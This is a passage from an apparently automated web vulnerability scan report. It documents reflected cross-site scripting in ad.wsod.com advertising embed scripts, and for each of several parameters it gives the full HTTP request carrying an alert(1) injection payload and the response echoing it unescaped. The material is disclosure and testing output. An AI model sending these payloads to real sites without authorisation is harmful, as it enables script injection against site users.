HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:30 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31049"-alert(1)-"aab598a9703 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=823120831049"-alert(1)-"aab598a9703&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:08 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2a8a"-alert(1)-"d8d13c332e8 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=Ge2a8a"-alert(1)-"d8d13c332e8&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:03 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b9ef"-alert(1)-"fca189d9ed0 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!4b9ef"-alert(1)-"fca189d9ed0&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:36:54 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
5.63. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7da8c"-alert(1)-"7e28ca43465 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74&7da8c"-alert(1)-"7e28ca43465=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:25 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1684
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2c33'-alert(1)-'0a2fa29519b was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898e2c33'-alert(1)-'0a2fa29519b&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:05 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:05 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:40771:1303843025:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:05 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 917
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898e2c33'-alert(1)-'0a2fa29519b&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } ...[SNIP]...
The value of the 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9758b'-alert(1)-'3377d1f28de was submitted in the 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!9758b'-alert(1)-'3377d1f28de&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:01 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:01 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:40771:1303843021:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:01 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 917
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!9758b'-alert(1)-'3377d1f28de&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; re ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d8f8'-alert(1)-'9db56fcbc1b was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=17974586289d8f8'-alert(1)-'9db56fcbc1b&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:19 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:19 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:40771:1303843039:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:19 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 917
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=17974586289d8f8'-alert(1)-'9db56fcbc1b&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image353() { docume ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc220'-alert(1)-'63411dca46a was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3cc220'-alert(1)-'63411dca46a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:34 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:34 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:40771:1303843054:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:34 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 917
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3cc220'-alert(1)-'63411dca46a'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image353() { document.write('<a href="//ad.wsod.com/click/8bec9b108 ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88997'-alert(1)-'ecbfd9fe416 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ88997'-alert(1)-'ecbfd9fe416&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:29 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:29 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:40771:1303843049:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:29 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 917
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ88997'-alert(1)-'ecbfd9fe416&ASID=5a9d1d95557d4344b789fe7d2c3b33e3'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image353() { document.write(' ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2df16'-alert(1)-'6ca3ac2d5fd was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=282534882df16'-alert(1)-'6ca3ac2d5fd&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:14 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:14 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:40771:1303843034:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:14 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 917
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=282534882df16'-alert(1)-'6ca3ac2d5fd&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image35 ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2e9f'-alert(1)-'f8feea60c6c was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=Ga2e9f'-alert(1)-'f8feea60c6c&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:10 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:10 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:40771:1303843030:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:10 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 917
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=Ga2e9f'-alert(1)-'f8feea60c6c&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } fun ...[SNIP]...
5.71. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload baa4c'-alert(1)-'46b9da792e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3&baa4c'-alert(1)-'46b9da792e5=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:38 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:38 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:40771:1303843058:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:38 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 920
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3&baa4c'-alert(1)-'46b9da792e5=1'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image353() { document.write('<a href="//ad.wsod.com/click/8bec9b1 ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b088d'-alert(1)-'3a36277583e was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898b088d'-alert(1)-'3a36277583e&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:29 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:29 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:45001:1303843289:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:29 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 858
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898b088d'-alert(1)-'3a36277583e&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } ...[SNIP]...
The value of the 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5eff5'-alert(1)-'4670c7c8014 was submitted in the 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
